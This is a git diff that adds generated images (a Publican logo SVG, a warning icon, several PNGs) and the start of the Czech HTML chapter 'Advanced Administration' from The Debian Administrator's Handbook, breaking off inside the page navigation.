+     style="fill:url(#linearGradient3216);fill-opacity:1" />
+  <g
+     transform="matrix(1.2433595,-0.05648069,-0.00851864,1.1425318,-114.05679,-272.08226)"
+     id="g3512"
+     style="enable-background:new">
+    <g
+       transform="matrix(0.7599177,-0.01192692,0,0.7500728,246.58115,378.18196)"
+       id="g3514">
+      <g
+         transform="matrix(2.8294915,-0.5196682,1.922722,2.7658074,-1390.7458,-622.14861)"
+         id="g3516">
+        <path
+           d="m 191.25,92.09375 c -0.20592,0.0097 -0.4015,0.01903 -0.59375,0.0625 L 129.21875,107.4375 114.875,97.78125 114.75,111.625 c -0.0268,3.59859 -0.0786,5.26638 1.90625,6.5625 l 50.3125,34.09375 c 0.1414,0.11519 0.2923,0.21282 0.4375,0.3125 0.30609,0.21013 0.63149,0.39638 0.96875,0.53125 0.0608,0.0243 0.12527,0.0408 0.1875,0.0625 0.85167,0.32374 1.78133,0.42664 2.5625,0.25 l 72.53125,-16.5 c 0.76901,-0.17389 1.24307,-0.58588 1.40625,-1.125 0.16316,-0.53911 0.0189,-1.22272 -0.5,-1.875 l -49.25,-40.03125 c -0.51896,-0.652313 -1.31584,-1.187828 -2.15625,-1.5 -0.63032,-0.23411 -1.28848,-0.341522 -1.90625,-0.3125 z"
+           transform="matrix(0.3165905,0.08474257,-0.2518713,0.3747611,270.47662,187.97058)"
+           id="path5539"
+           style="opacity:0.5;fill:#000000;fill-opacity:1;filter:url(#filter6542)" />
+        <path
+           d="m 281.53626,237.15326 27.51166,-0.60706 c 0.28726,0 0.54652,0.1161 0.73397,0.3043 0.18744,0.18821 0.30307,0.44853 0.30307,0.73697 l 5.50607,19.18448 c 0,0.28843 -0.11563,0.54874 -0.30307,0.73695 -0.18745,0.18821 -0.44671,0.30432 -0.73397,0.30432 l -27.12774,0.0421 c -0.57451,0 -1.03703,-0.46441 -1.03703,-1.04127 l -5.88999,-18.61951 c 0,-0.57687 0.46252,-1.04127 1.03703,-1.04127 z"
+           id="path3518"
+           style="fill:#8d0000;fill-opacity:1" />
+        <path
+           d="m 293.04884,250.57475 24.09263,-0.46052 c -2.06778,1.70244 -3.74217,4.07456 -3.72168,6.23725 l -24.60495,0.081 c -2.80034,-0.14106 1.92301,-6.21234 4.234,-5.85776 z"
+           id="path3520"
+           style="fill:url(#linearGradient3605);fill-opacity:1" />
+        <g
+           transform="matrix(0.4446532,0.0482263,-0.1333755,0.1962764,116.26445,175.89592)"
+           id="g3522">
+          <path
+             d="m 473.62579,276.25731 49.99465,-12.3175"
+             id="path3524"
+             style="fill:none;stroke:url(#linearGradient3607);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+          <path
+             d="M 473.62579,279.2625 523.62044,266.945"
+             id="path3526"
+             style="fill:none;stroke:url(#linearGradient3609);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+          <path
+             d="m 473.62579,282.26769 49.99465,-12.3175"
+             id="path3528"
+             style="fill:none;stroke:url(#linearGradient3611);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+          <path
+             d="m 473.62579,285.27287 49.99465,-12.3175"
+             id="path3530"
+             style="fill:none;stroke:url(#linearGradient3613);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+        </g>
+        <path
+           d="m 297.97117,252.53831 c 3.55435,7.23743 1.84248,10.21442 1.84248,10.21442 2.34309,-1.31419 3.98813,-2.90075 4.59366,-4.89297 1.69632,2.05733 3.28001,4.14745 6.61694,5.72721 0,0 -2.85323,-6.91061 -4.0263,-10.8615 l -9.02678,-0.18716 z"
+           id="path3532"
+           style="fill:#0093d9;fill-opacity:1;stroke-width:2" />
+        <path
+           d="m 284.57789,231.78049 26.77592,0.20008 c 0.68561,0 1.23756,0.55195 1.23756,1.23755 l 7.06718,15.78748 c 0,0.6856 -0.55195,1.23755 -1.23756,1.23755 l -27.04539,-0.34183 -8.03527,-16.88328 c 0,-0.6856 0.55195,-1.23755 1.23756,-1.23755 z"
+           id="path3534"
+           style="fill:url(#linearGradient6436);fill-opacity:1" />
+        <path
+           d="m 280.11847,237.40712 3.52338,-5.17553 7.74436,17.75537 c -3.36741,1.31622 -7.06065,7.43359 -3.57281,7.85099 -0.90727,0.0228 -1.25561,-0.2564 -1.40216,-0.76942 l -7.33593,-17.04682 c -0.30195,-0.65394 0.12828,-1.26825 1.04316,-2.61459 z"
+           id="path3536"
+           style="fill:#bc0000;fill-opacity:1" />
+        <path
+           d="m 284.81403,231.70142 25.95424,-0.0282 c 0.46998,0 0.84832,0.37836 0.84832,0.84833 0.22453,6.59441 -14.1341,15.47802 -20.88485,16.08864 l -6.76604,-16.0604 c 0,-0.46997 0.37835,-0.84833 0.84833,-0.84833 z"
+           id="path3538"
+           style="fill:url(#radialGradient3615);fill-opacity:1" />
+        <path
+           d="m 300.57764,261.77315 c 2.52506,-1.48438 3.39499,-3.74367 3.94533,-5.4168 0.129,2.75802 6.15463,7.38876 5.50424,5.77641 -2.09513,-5.19394 -2.45794,-8.70017 -3.21244,-8.8903 -1.09621,-0.27623 -6.29411,-0.14168 -7.77351,-0.22359 1.0853,2.18428 1.8036,4.4636 1.53638,8.75428 z"
+           id="path3540"
+           style="opacity:0.79901961;fill:url(#radialGradient3617);fill-opacity:1;stroke-width:2" />
+        <path
+           d="m 319.47279,249.25686 c 0,0.6856 -0.36012,0.98755 -1.04573,0.98755 l -26.46288,0.44824 -0.60592,-0.84306 c 7.14032,-0.21334 18.76088,-0.20836 28.11453,-0.59273 z"
+           id="path3542"
+           style="fill:#a70000;fill-opacity:1" />
+      </g>
+    </g>
+  </g>
+  <path
+     d="m 14.400303,150.8796 3.34996,0 c 2.70348,0 5.3482,-0.23509 7.52274,-0.76403 4.52538,-1.17543 9.69726,-4.34909 9.69726,-11.69549 0,-4.46662 -1.93945,-7.52274 -4.58416,-9.16833 -2.82102,-1.76314 -6.58239,-2.35086 -10.69638,-2.35086 l -16.3971997,0 0,1.70437 c 5.17187,0.35263 5.28942,0.47018 5.28942,3.76137 l 0,30.4454 c 0,3.29119 -0.11755,3.40874 -5.28942,3.76137 l 0,1.70437 17.3375397,0 0,-1.70437 c -6.05344,-0.35263 -6.22976,-0.47018 -6.22976,-3.76137 l 0,-11.93243 m 0,-19.74717 c 0,-1.6456 0.64649,-2.17454 4.46662,-2.17454 6.05344,0 9.75604,3.46752 9.75604,9.87358 0,7.34641 -4.81925,9.99113 -9.87358,9.99113 -3.46751,0 -4.34908,-0.11754 -4.34908,-2.29208 l 0,-15.39809 m 58.765624,36.43823 0,-1.70437 c -4.05522,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,13.22355 c 0,1.6456 -0.17631,2.93857 -0.47017,3.52628 -1.35174,2.70348 -4.17276,4.40785 -7.22887,4.40785 -3.40874,0 -5.93591,-2.11577 -5.93591,-6.69993 l 0,-19.98225 -0.4114,-0.35263 -9.227094,1.46928 0,1.46928 2.233314,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,15.51563 c 0,6.7587 3.99645,8.8157 8.34553,8.8157 4.99556,0 9.05079,-3.40874 10.75515,-4.23153 l 0.58772,3.52628 9.40341,0 m 9.15435,0.70525 2.35085,-2.29208 c 2.05699,1.17543 4.5254,2.29208 8.93324,2.29208 7.816583,0 14.634063,-3.76138 14.634063,-15.75072 0,-3.64381 -0.76403,-14.45774 -11.342863,-14.45774 -4.46662,0 -7.93414,2.87979 -10.10867,4.17276 l 0,-17.92525 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.23509 c 1.52805,0.17631 1.88068,0.47017 1.88068,2.70348 l 0,37.96628 1.05789,0.47017 m 4.46662,-19.57085 c 0,-1.46928 0.11754,-2.40963 0.58771,-3.34997 1.41051,-2.82102 3.87891,-4.11399 7.1701,-4.11399 2.40962,0 7.581513,1.41052 7.581513,11.63672 0,8.63938 -2.644723,13.3411 -8.463083,13.3411 -3.11487,0 -5.40696,-1.58683 -6.46484,-4.5254 -0.35263,-1.05788 -0.4114,-2.29208 -0.4114,-3.70259 l 0,-9.28587 m 37.375603,-24.3901 -0.4114,-0.35263 -9.22709,1.46928 0,1.46928 2.2333,0.23509 c 1.52806,0.17631 1.88069,0.47017 1.88069,2.70348 l 0,32.61809 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.3402,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-38.14259 m 9.43811,15.22177 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17277,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.41141,-0.35263 -9.22709,1.46928 m 6.81747,-13.98758 c -2.11576,0 -3.58505,1.52806 -3.58505,3.64383 0,2.05699 1.46929,3.52628 3.58505,3.52628 2.17454,0 3.52628,-1.46929 3.58505,-3.52628 0,-2.11577 -1.41051,-3.64383 -3.58505,-3.64383 m 27.69946,39.67065 c -6.99378,0 -8.63939,-7.28765 -8.63939,-12.81215 0,-8.75692 3.46752,-12.28321 7.52274,-12.28321 2.70347,0 4.40785,1.93946 5.58327,5.11311 0.35263,0.94034 0.70526,1.52805 1.82191,1.52805 1.17543,0 3.46751,-0.76403 3.46751,-2.99733 0,-2.70348 -3.87891,-5.70082 -10.22621,-5.70082 -10.69637,0 -14.28143,7.58151 -14.28143,15.39809 0,9.8148 4.81925,14.81037 13.63495,14.81037 4.11398,0 9.6385,-2.17454 11.28409,-8.46307 l -1.70437,-0.8228 c -1.82191,4.11399 -4.17277,6.22976 -8.46307,6.22976 m 33.63996,-6.05344 c 0,4.76047 -3.64382,5.99467 -5.9359,5.99467 -3.64382,0 -5.40697,-2.58594 -5.40697,-6.05345 0,-2.76225 1.29298,-4.17276 4.58417,-5.40696 2.35085,-0.88157 5.46573,-1.99822 6.7587,-2.82102 l 0,8.28676 m 5.28942,-13.28233 c 0,-3.40873 -0.76404,-7.81658 -9.6385,-7.81658 -6.64115,0 -11.87181,3.46751 -11.87181,6.69993 0,1.88068 2.17454,2.76225 3.2912,2.76225 1.23419,0 1.58682,-0.64648 1.88068,-1.6456 1.29297,-4.34907 3.7026,-5.75959 6.05345,-5.75959 2.29208,0 4.99556,1.17544 4.99556,5.87714 l 0,2.46839 c -1.46928,1.52806 -7.17011,2.99734 -11.81304,4.46662 -4.23153,1.29297 -5.46573,4.23154 -5.46573,6.99379 0,4.40785 2.93857,8.34553 8.46307,8.34553 3.64382,-0.11754 6.87625,-2.29208 8.75693,-3.52628 0.8228,2.17454 1.76314,3.52628 3.82014,3.52628 2.17453,0 4.7017,-0.64648 6.93501,-1.76314 l -0.35262,-1.41051 c -0.8228,0.17631 -2.11577,0.29386 -2.99734,0.0588 -1.05789,-0.23508 -2.057,-1.35174 -2.057,-5.05433 l 0,-14.22267 m 38.36187,1.52806 c 0,-5.9359 -3.23243,-9.34464 -8.63939,-9.34464 -4.34907,0 -7.05256,2.11577 -10.69638,4.46662 l -0.8228,-4.46662 -8.75693,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17631,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-13.75249 c 0,-1.46928 0.11754,-2.29208 0.58771,-3.23243 1.2342,-2.29207 3.87891,-4.23153 6.99379,-4.23153 3.99645,0 6.17099,2.23331 6.17099,7.34642 l 0,13.87003 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-15.04546"
+     id="text2427"
+     style="font-size:58.77133179px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;line-height:125%;writing-mode:lr-tb;text-anchor:start;fill:url(#linearGradient3224);fill-opacity:1;stroke:none;font-family:Utopia;-inkscape-font-specification:Utopia" />
+  <text
+     x="213.01947"
+     y="195.03021"
+     id="text2432"
+     xml:space="preserve"
+     style="font-size:13.46161938px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:end;line-height:125%;writing-mode:lr-tb;text-anchor:end;fill:#888a85;fill-opacity:1;stroke:none;font-family:Liberation Sans;-inkscape-font-specification:Liberation Sans"><tspan
+       x="213.01947"
+       y="195.03021"
+       id="tspan2434"
+       style="font-size:13.46161938px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:end;line-height:125%;letter-spacing:0.44818318;writing-mode:lr-tb;text-anchor:end;fill:#888a85;font-family:Liberation Sans;-inkscape-font-specification:Liberation Sans">BOOK PUBLISHING TOOL</tspan></text>
+  <path
+     d="m 14.400303,154.07795 3.34996,0 c 2.70348,0 5.3482,-0.23509 7.52274,-0.76403 4.52538,-1.17543 9.69726,-4.34909 9.69726,-11.69549 0,-4.46662 -1.93945,-7.52274 -4.58416,-9.16833 -2.82102,-1.76314 -6.58239,-2.35086 -10.69638,-2.35086 l -16.3971997,0 0,1.70437 c 5.17187,0.35263 5.28942,0.47018 5.28942,3.76137 l 0,30.4454 c 0,3.29119 -0.11755,3.40874 -5.28942,3.76137 l 0,1.70437 17.3375397,0 0,-1.70437 c -6.05344,-0.35263 -6.22976,-0.47018 -6.22976,-3.76137 l 0,-11.93243 m 0,-19.74717 c 0,-1.6456 0.64649,-2.17454 4.46662,-2.17454 6.05344,0 9.75604,3.46752 9.75604,9.87358 0,7.34641 -4.81925,9.99113 -9.87358,9.99113 -3.46751,0 -4.34908,-0.11754 -4.34908,-2.29208 l 0,-15.39809 m 58.765624,36.43823 0,-1.70437 c -4.05522,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,13.22355 c 0,1.6456 -0.17631,2.93857 -0.47017,3.52628 -1.35174,2.70348 -4.17276,4.40785 -7.22887,4.40785 -3.40874,0 -5.93591,-2.11577 -5.93591,-6.69993 l 0,-19.98225 -0.4114,-0.35263 -9.227094,1.46928 0,1.46928 2.233314,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,15.51563 c 0,6.7587 3.99645,8.8157 8.34553,8.8157 4.99556,0 9.05079,-3.40874 10.75515,-4.23153 l 0.58772,3.52628 9.40341,0 m 9.15435,0.70525 2.35085,-2.29208 c 2.05699,1.17543 4.5254,2.29208 8.93324,2.29208 7.816583,0 14.634063,-3.76138 14.634063,-15.75072 0,-3.64381 -0.76403,-14.45774 -11.342863,-14.45774 -4.46662,0 -7.93414,2.87979 -10.10867,4.17276 l 0,-17.92525 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.23509 c 1.52805,0.17631 1.88068,0.47017 1.88068,2.70348 l 0,37.96628 1.05789,0.47017 m 4.46662,-19.57085 c 0,-1.46928 0.11754,-2.40963 0.58771,-3.34997 1.41051,-2.82102 3.87891,-4.11399 7.1701,-4.11399 2.40962,0 7.581513,1.41052 7.581513,11.63672 0,8.63938 -2.644723,13.3411 -8.463083,13.3411 -3.11487,0 -5.40696,-1.58683 -6.46484,-4.5254 -0.35263,-1.05788 -0.4114,-2.29208 -0.4114,-3.70259 l 0,-9.28587 m 37.375603,-24.3901 -0.4114,-0.35263 -9.22709,1.46928 0,1.46928 2.2333,0.23509 c 1.52806,0.17631 1.88069,0.47017 1.88069,2.70348 l 0,32.61809 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.3402,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-38.14259 m 9.43811,15.22177 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17277,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.41141,-0.35263 -9.22709,1.46928 m 6.81747,-13.98758 c -2.11576,0 -3.58505,1.52806 -3.58505,3.64383 0,2.05699 1.46929,3.52628 3.58505,3.52628 2.17454,0 3.52628,-1.46929 3.58505,-3.52628 0,-2.11577 -1.41051,-3.64383 -3.58505,-3.64383 m 27.69946,39.67065 c -6.99378,0 -8.63939,-7.28765 -8.63939,-12.81215 0,-8.75692 3.46752,-12.28321 7.52274,-12.28321 2.70347,0 4.40785,1.93946 5.58327,5.11311 0.35263,0.94034 0.70526,1.52805 1.82191,1.52805 1.17543,0 3.46751,-0.76403 3.46751,-2.99733 0,-2.70348 -3.87891,-5.70082 -10.22621,-5.70082 -10.69637,0 -14.28143,7.58151 -14.28143,15.39809 0,9.8148 4.81925,14.81037 13.63495,14.81037 4.11398,0 9.6385,-2.17454 11.28409,-8.46307 l -1.70437,-0.8228 c -1.82191,4.11399 -4.17277,6.22976 -8.46307,6.22976 m 33.63996,-6.05344 c 0,4.76047 -3.64382,5.99467 -5.9359,5.99467 -3.64382,0 -5.40697,-2.58594 -5.40697,-6.05345 0,-2.76225 1.29298,-4.17276 4.58417,-5.40696 2.35085,-0.88157 5.46573,-1.99822 6.7587,-2.82102 l 0,8.28676 m 5.28942,-13.28233 c 0,-3.40873 -0.76404,-7.81658 -9.6385,-7.81658 -6.64115,0 -11.87181,3.46751 -11.87181,6.69993 0,1.88068 2.17454,2.76225 3.2912,2.76225 1.23419,0 1.58682,-0.64648 1.88068,-1.6456 1.29297,-4.34907 3.7026,-5.75959 6.05345,-5.75959 2.29208,0 4.99556,1.17544 4.99556,5.87714 l 0,2.46839 c -1.46928,1.52806 -7.17011,2.99734 -11.81304,4.46662 -4.23153,1.29297 -5.46573,4.23154 -5.46573,6.99379 0,4.40785 2.93857,8.34553 8.46307,8.34553 3.64382,-0.11754 6.87625,-2.29208 8.75693,-3.52628 0.8228,2.17454 1.76314,3.52628 3.82014,3.52628 2.17453,0 4.7017,-0.64648 6.93501,-1.76314 l -0.35262,-1.41051 c -0.8228,0.17631 -2.11577,0.29386 -2.99734,0.0588 -1.05789,-0.23508 -2.057,-1.35174 -2.057,-5.05433 l 0,-14.22267 m 38.36187,1.52806 c 0,-5.9359 -3.23243,-9.34464 -8.63939,-9.34464 -4.34907,0 -7.05256,2.11577 -10.69638,4.46662 l -0.8228,-4.46662 -8.75693,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17631,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-13.75249 c 0,-1.46928 0.11754,-2.29208 0.58771,-3.23243 1.2342,-2.29207 3.87891,-4.23153 6.99379,-4.23153 3.99645,0 6.17099,2.23331 6.17099,7.34642 l 0,13.87003 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-15.04546"
+     id="path6354"
+     style="font-size:58.77133179px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;line-height:125%;writing-mode:lr-tb;text-anchor:start;opacity:0.49038463;fill:url(#linearGradient6356);fill-opacity:1;stroke:none;filter:url(#filter6426);font-family:Utopia;-inkscape-font-specification:Utopia" />
+  <g
+     transform="translate(-58.623593,-52.746766)"
+     id="layer1" />
+  <g
+     transform="translate(-58.623593,-52.746766)"
+     id="layer2"
+     style="filter:url(#filter6626)" />
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/warning.png b/tmp/cs-CZ/html/Common_Content/images/warning.png
new file mode 100644
index 000000000..94b69d1ff
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/warning.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/warning.svg b/tmp/cs-CZ/html/Common_Content/images/warning.svg
new file mode 100644
index 000000000..4231e5ac0
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/warning.svg
@@ -0,0 +1,130 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+<svg
+   xmlns:dc="http://purl.org/dc/elements/1.1/"
+   xmlns:cc="http://creativecommons.org/ns#"
+   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   xmlns:xlink="http://www.w3.org/1999/xlink"
+   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
+   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
+   version="1.0"
+   width="48"
+   height="48"
+   id="svg5921"
+   sodipodi:version="0.32"
+   inkscape:version="0.46"
+   sodipodi:docname="warning.svg"
+   inkscape:output_extension="org.inkscape.output.svg.inkscape">
+  <metadata
+     id="metadata11">
+    <rdf:RDF>
+      <cc:Work
+         rdf:about="">
+        <dc:format>image/svg+xml</dc:format>
+        <dc:type
+           rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
+      </cc:Work>
+    </rdf:RDF>
+  </metadata>
+  <sodipodi:namedview
+     inkscape:window-height="975"
+     inkscape:window-width="1680"
+     inkscape:pageshadow="2"
+     inkscape:pageopacity="0.0"
+     guidetolerance="10.0"
+     gridtolerance="10.0"
+     objecttolerance="10.0"
+     borderopacity="1.0"
+     bordercolor="#666666"
+     pagecolor="#ffffff"
+     id="base"
+     showgrid="false"
+     inkscape:zoom="1"
+     inkscape:cx="49.390126"
+     inkscape:cy="6.0062258"
+     inkscape:window-x="0"
+     inkscape:window-y="25"
+     inkscape:current-layer="svg5921" />
+  <defs
+     id="defs5923">
+    <linearGradient
+       inkscape:collect="always"
+       id="linearGradient2400">
+      <stop
+         style="stop-color:#fac521;stop-opacity:1;"
+         offset="0"
+         id="stop2402" />
+      <stop
+         style="stop-color:#fde7a3;stop-opacity:1"
+         offset="1"
+         id="stop2404" />
+    </linearGradient>
+    <inkscape:perspective
+       sodipodi:type="inkscape:persp3d"
+       inkscape:vp_x="0 : 20 : 1"
+       inkscape:vp_y="0 : 1000 : 0"
+       inkscape:vp_z="40 : 20 : 1"
+       inkscape:persp3d-origin="20 : 13.333333 : 1"
+       id="perspective13" />
+    <inkscape:perspective
+       id="perspective2396"
+       inkscape:persp3d-origin="24 : 16 : 1"
+       inkscape:vp_z="48 : 24 : 1"
+       inkscape:vp_y="0 : 1000 : 0"
+       inkscape:vp_x="0 : 24 : 1"
+       sodipodi:type="inkscape:persp3d" />
+    <inkscape:perspective
+       id="perspective2394"
+       inkscape:persp3d-origin="372.04724 : 350.78739 : 1"
+       inkscape:vp_z="744.09448 : 526.18109 : 1"
+       inkscape:vp_y="0 : 1000 : 0"
+       inkscape:vp_x="0 : 526.18109 : 1"
+       sodipodi:type="inkscape:persp3d" />
+    <linearGradient
+       inkscape:collect="always"
+       xlink:href="#linearGradient2400"
+       id="linearGradient2406"
+       x1="-2684.8242"
+       y1="1639.8413"
+       x2="-2684.8242"
+       y2="1587.1559"
+       gradientUnits="userSpaceOnUse" />
+  </defs>
+  <g
+     transform="matrix(0.4536635,0,0,0.4536635,-5.1836431,-4.6889387)"
+     id="layer1">
+    <g
+       transform="translate(2745.6887,-1555.5977)"
+       id="g8304"
+       style="enable-background:new" />
+  </g>
+  <g
+     id="g3189"
+     transform="matrix(1.2987724,0,0,1.2987724,-1.4964485,-1.8271549)">
+    <path
+       style="opacity:1;fill:#2e3436;fill-opacity:1;stroke:none;stroke-opacity:1;enable-background:new"
+       id="path8034"
+       transform="matrix(0.3735251,4.0822414e-3,-4.0822414e-3,0.3735251,605.96125,-374.33682)"
+       d="M -1603,1054.4387 L -1577.0919,1027.891 L -1540,1027.4387 L -1513.4523,1053.3468 L -1513,1090.4387 L -1538.9081,1116.9864 L -1576,1117.4387 L -1602.5477,1091.5306 L -1603,1054.4387 z" />
+    <path
+       style="opacity:1;fill:url(#linearGradient2406);fill-opacity:1;stroke:none;stroke-width:0.72954363000000000;stroke-opacity:1;enable-background:new"
+       id="path8036"
+       d="M -2723.6739,1596.2775 L -2704.5623,1577.1175 L -2677.5001,1577.0833 L -2658.3401,1596.1949 L -2658.3059,1623.257 L -2677.4175,1642.417 L -2704.4797,1642.4513 L -2723.6396,1623.3396 L -2723.6739,1596.2775 z"
+       transform="matrix(0.4536635,0,0,0.4536635,1240.4351,-710.40684)" />
+    <path
+       transform="translate(6.7837002e-6,-8.8630501e-6)"
+       id="path3178"
+       d="M 13.46875,5.0625 L 4.8125,13.78125 L 4.8125,16.625 L 13.46875,7.9375 L 25.75,7.90625 L 34.4375,16.59375 L 34.4375,13.71875 L 25.75,5.0625 L 13.46875,5.0625 z"
+       style="opacity:1;fill:#fde8a6;fill-opacity:1;stroke:none;stroke-width:0.72954363;stroke-opacity:1;enable-background:new" />
+    <path
+       id="path4412"
+       style="fill:#fef2cb;fill-opacity:1;stroke:#fef2cb;stroke-width:0.9430126;stroke-linecap:round;stroke-linejoin:round;stroke-opacity:1"
+       d="M 23.308501,28.806303 C 23.308501,30.239154 22.087319,31.313792 20.231121,31.313792 L 20.198559,31.313792 C 18.358657,31.313792 17.121188,30.239154 17.121188,28.806303 C 17.121188,27.308327 18.391219,26.282537 20.231121,26.282537 C 22.054757,26.282537 23.27593,27.308327 23.308501,28.806303 z M 22.982851,24.507759 L 24.057489,11.351592 L 16.355915,11.351592 L 17.430553,24.507759 L 22.982851,24.507759 z" />
+    <path
+       id="path4414"
+       style="fill:#2e3436"
+       d="M 22.732962,27.86025 C 22.732962,29.293101 21.51178,30.36774 19.655592,30.36774 L 19.623029,30.36774 C 17.783118,30.36774 16.545659,29.293101 16.545659,27.86025 C 16.545659,26.362275 17.81568,25.336485 19.655592,25.336485 C 21.479218,25.336485 22.7004,26.362275 22.732962,27.86025 z M 22.407312,23.561697 L 23.48195,10.40553 L 15.780385,10.40553 L 16.855023,23.561697 L 22.407312,23.561697 z" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/watermark-draft.png b/tmp/cs-CZ/html/Common_Content/images/watermark-draft.png
new file mode 100644
index 000000000..d98d95a8f
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/watermark-draft.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/yellow.png b/tmp/cs-CZ/html/Common_Content/images/yellow.png
new file mode 100644
index 000000000..223865d77
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/yellow.png differ
diff --git a/tmp/cs-CZ/html/advanced-administration.html b/tmp/cs-CZ/html/advanced-administration.html
new file mode 100644
index 000000000..4652fc167
--- /dev/null
+++ b/tmp/cs-CZ/html/advanced-administration.html
@@ -0,0 +1,1279 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 12. Advanced Administration</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="RAID, LVM, FAI, Preseeding, Monitoring, Virtualization, Xen, LXC" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.rtc-services.html"
+        title="11.8. Real-Time Communication Services" /><link
+        rel="next"
+        href="sect.virtualization.html"
+        title="12.2. Virtualization" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/advanced-administration.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rtc-services.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
